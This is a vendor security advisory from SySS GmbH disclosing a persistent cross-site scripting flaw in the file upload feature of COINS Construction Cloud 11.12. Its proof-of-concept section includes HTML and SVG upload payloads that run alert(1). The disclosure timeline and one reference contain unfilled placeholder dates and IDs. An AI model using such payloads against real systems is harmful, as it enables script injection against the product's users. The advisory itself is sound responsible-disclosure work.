-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2021-030
Product:                   COINS Construction Cloud
Manufacturer:              Construction Industry Solutions (COINS)
Affected Version(s):       11.12
Tested Version(s):         11.12
Vulnerability Type:        Cross-Site Scripting (CWE-79)
Risk Level:                High
Solution Status:           Not Fixed
Manufacturer Notification: 2021-11-02
Solution Date:             --
Public Disclosure:         2022-01-13
CVE Reference:             CVE-2021-45227
Author of Advisory:        Philipp Rieth, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

COINS Construction Cloud is an enterprise resource planning software 
specifically for the construction industry.

The manufacturer describes the product as follows (see [1]):

"COINS Construction Cloud is a powerful solution that enables construction 
companies, their subcontractors, suppliers and workforce – to work better 
together on site, off site, on the road and in the office."

Due to an inappropriate use of HTML <iframe> tags, the file upload 
functionality is vulnerable to a persistent cross-site scripting attack.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

To embed and display uploaded files on the website, an HTML <iframe> tag 
is used. This enables attackers to store malicious JavaScript code in 
uploaded files which is executed once the file is embedded into the website. 
Affected file types are .html and .svg files.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Uploading the following HTML file results in an opened JavaScript alert() 
box once the file is viewed on the website:

<!DOCTYPE html>
  <html>
  <body>
    <h1>Malicious Website</h1>
    <script>alert(1);</script>
  </body>
</html>

Uploading the following SVG file results in an opened JavaScript alert() 
box once the file is viewed on the website:

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" 
    fill="#009900" stroke="#004400"></polygon>
  <script type="text/javascript">alert(1);</script>
</svg>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

There is no known solution yet.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-04-20: Vulnerability discovered
2021-11-02: Vulnerability reported to manufacturer
2021-??-??: Patch released by manufacturer
2021-??-??: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for COINS Construction Cloud
    https://www.coins-global.com/solutions/47/
[2] SySS Security Advisory SYSS-XXXX-XXX
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-XXXX-XXX.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Philipp Rieth of SySS GmbH.

E-Mail: philipp.rieth@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Philipp_Rieth.asc
Key ID: 0x18A0750E91942316
Key Fingerprint: 2B75 C642 944A 8331 CFBC FC10 7621 A8F8 68C0 6D5F

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEK3XGQpRKgzHPvPwQdiGo+GjAbV8FAmJWxHkACgkQdiGo+GjA
bV8nJg/9Hb2Exaod0qpcr0LbhQLdLqPy3sVyIOAMQTponmNFJLTfGsFZ52VVejAM
zQq9b4+EEdgNZrhKcgWKLWgcXrE8x6wRuUDKRB1Tu/pV3wEjO4BVQpdcGQLDAUCw
Bh3gktNOTuQoPGcJ2deELGSxb6ypNrc2HwzVKtj3OEvFBx3cXNKtTYa5lDWSADXg
m/JGgDdleTf9K9jifpHEnB9tP79h1HbaAks2PwyS+FvtlnQCHlr49ldzI1KoLSKp
gxDXBKPRD8L6diyHukv223AorR1cZlmAa8tOL+koNHbeGoYShYV+K9K11xCE2ER4
b3Hr7Xv4zBm3ycLm3XIl8LNPODZlzm7CTxOtgoCRtBnPRaHd8T5HZs9sXS/iuWDl
RooD5Z9xMnaryZQ+9thtlN5B20MvGahQFC3qsndAtu8GlYe6snWtgq8eXRYDw3pF
jqIYaYMhySfaltwf/J5ETlOub5G5LQs/pg8Kc1SDcqLnrFQGEtywye0DRJy6LO+J
YcXdVsEF3L1ptHh2dBbJY2HTlu7awJSsz+Lf4PwcWAuYTq2lTRYwgTtHcPmx/u0q
GWwYdVrUTkeDJB3sN4/cNvfNqs5wdyNuRST9bcy3n8jESXx0wluOWzfYpl2FBBZM
dv44BMhTpc8o/jpf3LVRLZw9BC94wgPct/oCC56QLv1qzl7nJTk=
=SMMF
-----END PGP SIGNATURE-----